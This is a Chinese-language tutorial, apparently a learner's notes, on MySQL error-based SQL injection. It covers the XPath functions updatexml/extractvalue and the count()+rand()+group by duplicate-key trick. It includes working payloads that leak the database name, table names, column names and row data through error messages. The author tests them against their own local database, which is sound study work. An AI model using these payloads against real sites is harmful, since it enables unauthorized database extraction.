一.什么是报错注入
1.相关概念
[概念1:盲注]
盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。
[概念2:报错注入]
页面上没有显示位,但是会输出SQL语句执行错误信息。比如mysqlerror()函数的报错信息。
区分开无显示位和无回显的区别,union无法作用在两者情况下
无显示位不一定是无回显,但是无回显一定无显示位
2.特征及适用场景
1.特征:
SQL报错注入就是利用数据库的某些机制,人为地制造错误条件使得查询结果能够出现在错误信息中。
2.应用场景:
这种手段在①联合查询受限且②能返回错误信息的情况下比较好用。
3.报错注入的分类
1.Biglnt等数据类型溢出
2.xpath语法错误
3.count()+rand()+group by()导致主键重复
4.空间数据类型函数错误
本文学习:
- xpatah语法错误
- count()+rand()+group by()导致主键重复
4.xpath相关知识学习
1.相关概念简单学习
[概念1:XML语言]
含义:可扩展标记语言(eXtensible Markup Language)。
作用:传输数据而非显示数据(区别HTML语言)
一个网站可能用php、java、python等其他语言开发,这些语言可以通用xml类型文件进行数据规范、数据传输
[概念2:Xpath语言]
一门专门用来查找XML数据内容的一门语言(也可以叫做规范)
用来在XML文档中对元素属性进行遍历
2.MySql相关的xml函数
从MySql5.1.5开始提供了两个XML查询和修改的函数:
--1.updatexml():适用于5.5.5-5.5.49版本
updatexml函数格式:updatexml(xml_document,xpath_string,new_value)
①xml_document:xml文件的名称
②xpath_string:xpath格式的字符串
③new_value:替换查找到的符合条件的数据
功能:简单来说,查找一个字符串,并进行替换
--2.extractvalue():适用于5.1.5+版本
extractvalue函数格式:extractvalue(xml_document,xpath_string)
①xml_document:xml文件的名称
②xpath_string:xpath格式的字符串
3.与报错注入的联系
--1.联系
我们在xpath_string处也就是第二个参数那里传入不符合xpath格式的特殊字符,并加上一些查询语句,mysql就会把错误和查询语句的结果报错显示出来。这就是xpath报错注入的原理。
--2.注意事项
①必须是在XPath string处传特殊字符,mysql才会报错。
②同时我们还需要注入命令,没这么多位置,所以要用到concat函数。
③xpath只会对特殊字符进行报错,这里我们可以用16进制的0x7e(~)来进行利用。
④xpath只会报错32个字符,对于输出结果大于32个字符的命令要用substr函数截取后分段输出,
5.虚拟表相关知识学习
1.count()+group by
[关键:]count()+rand()+group by()导致主键重复
原始表
select * from users; id为主键,同为adam的有4个(id分别为1,4,6,8),同为nsb的有2个(id分别为2,3),同为nsb1的有2个(id分别为5,7)
执行以下命令1:select * from users group by name;
id本身作为主键,唯一且不为NULL,所以在虚拟表中只会出现1个id,且是第1次的id,(第1次的id是1)
group by name之后,name将作为虚拟表的新主键,因此,重名的name将会被删除,只留下1个唯一。
group by语句
1.语法:
select column1, aggregate_function(column2) from table_name where condition group by column1;
①column1:指定分组的列
②aggregate_function:对分组后的每个组执行的聚合函数
③table_name:要查询的表名
④condition:可选,用于筛选结果的条件
2.知识补充:MySql中的聚合函数(5个) ①avg()求平均数,只能适用于数值类型,不含NULL
②sum()求和,只能适用于数值类型,不含NULL
③max()求最大,适用于数值类型、字符串类型、日期时间类型的字段(或变量)不包含NULL值
④min(),求最小,适用于数值类型、字符串类型、日期时间类型的字段(或变量)不包含NULL值
⑤count(),计数,计算指定字段在查询结构中出现的个数(不包含NULL值)
原理:
执行以下命令2:select *,count(*) from users group by name; --一个分组的情况
count( * ) 效果和count(phone)、count(id)效果一样,结果一样,都受主键的约束
执行以下命令3:select *,count(*) from users group by name,phone; --两个分组的情况
count( * ) 效果和count(phone)、count(id)效果一样,结果一样,都受主键的约束
只需要保证name和phone不全相同即为不重复
2.rand函数
1.rand()
随机生成一个[0,1)范围的随机小数,每次执行结果均不相同
命令:select rand();
执行第1次
执行第2次
2.rand(数字)
命令:select rand(任意数字)--任意数字象征着"种子"
特性1:每个种子对应固定的随机数值
特性2:随机数种子相同,但是行不同,产生的随机数也不同
特性3:带有小数的时候,小数部分"小于0.5"是一个随机数,"大于等于0.5"是另一个随机数
区分在于有小数的时候,例如1.1和1.9他们是在1.1<1.5的区间和1.9>=1.5的区间,产生的随机数也不一样,无论小数位数怎么变依旧如此,例如rand(1.1)结果和rand(1.123)是一样的
任意数字取1.1执行多次
任意数字取1.9执行多次
任意数字取0多次
3.floor函数
floor(任意数),向下取整该数 "<=该数且为整数"
命令1:select floor(1.5);
命令2:select floor(-1.5);
4.rand函数与floor函数搭配使用
例如:生成[5,10]之间的随机整数
rand()范围是[0.1),则6*rand()+5的范围是[5,11)
则floor(6*rand()+5)的范围是[5,10]
命令:select floor(6*rand()+5);
6.相关报错注入命令执行原理
前置知识:floor函数、rand函数、group by语句特点(虚拟表)
1.先通过正确的命令来学习报错原理:
命令1(未进行分组):select count(*),concat((select database()),0x7e,floor(rand(0)*2))as A from information_schema.tables;
分析: ①concat连接的是 ~、database()、0
②as A表示将前面的concat((select database()),0x7e,floor(rand(0)*2))作为A
③表information_schema.tables也可以换成自己的表
命令2(进行分组):select count(*),concat((select database()),0x7e,floor(rand(0)*2))as A from users group by name;
分析:因为group by分组后显示的只有3行,每行都要被concat和count操作一遍(聚合函数),而由于
"rand(任意数)"的特性 ,即相同随机数,不同随机行也会产生不同随机数。因此搭配floor和数值乘以2可以显示出"test ~ 0"或者"test ~ 1",且只有这两种显示:要么是0,要么是1,在[0,1]区间内的整数
2.主键报错显示数据库名
注意:这里的test是我自己的数据库名
命令1:select count(*),concat((select database()),0x7e,floor(rand(0)*2))as A from users group by A;
分析:即以A=concat内容("test ~ 0"或"test ~ 1")进行主键排查报错,因为不能有两个相同的主键
3.主键报错显示表名
命令1:select count(*),concat((select table_name from information_schema.tables where table_schema='test'limit 0,1),0x7e,floor(rand(0)*2))as A from information_schema.tables group by A;
--这里得到第1个表名为people
分析:①与"主键报错显示数据库名"的区别在于,对应位置替换成了对数据库表名的查询SQL语句,且增加了limit的限制,因为报错只能报错1行信息,因此可以通过对limit后面参数的payload进行表名爆破
命令2:select count(*),concat((select table_name from information_schema.tables where table_schema='test'limit 1,1),0x7e,floor(rand(0)*2))as A from information_schema.tables group by A;
--这里得到第2个表名为users,相比命令1只是把limit的"0,1"参数改为了"1,1"
4.主键报错显示列名
命令1:select count(*),concat((select column_name from information_schema.columns where table_schema='test'limit 0,1),0x7e,floor(rand(0)*2))as A from information_schema.tables group by A;
--这里得到第1个列名为ch_name
5.主键报错显示数据
已知该表people为:
命令1:select 1 from (select count(*),concat((select (select (select concat(0x7e,ch_name,0x7e))) from people limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a;
实际上这里有一个待解决的问题
发现:当把ch_name的数据类型设置为var(数字小于等于236)时,利用该语句可以显示报错,
但是当把ch_name的数据类型设置为var(数字大于236)时,利用该语句不会显示报错。
不明白为什么会这样,这一点可以用于该注入类型漏洞的防护
相比之下,phone字段是int型,设置为int(255),即使数字255大于236但是仍然会报错,不知道原因为啥
也就是说,此类主键报错语句比较针对数据类型及数据类型的长度,在防护层面可以多考虑这一点
我这里的数据库版本为5.5.53
6.注意事项
1.由于"and"连接前后的值一定是布尔值(非0即1),所以and之后的[select 1(任意数字) from table;]是为了使结果为1和and前面的值相匹配,一般用来当做判断子查询是否成功
2.select 1 from table;这里的table就是我们后续用到的虚拟表方法,虚拟表也是个表,重命名是为了便于代码更加易读性,因为层层嵌套的select语句对初学者不太友好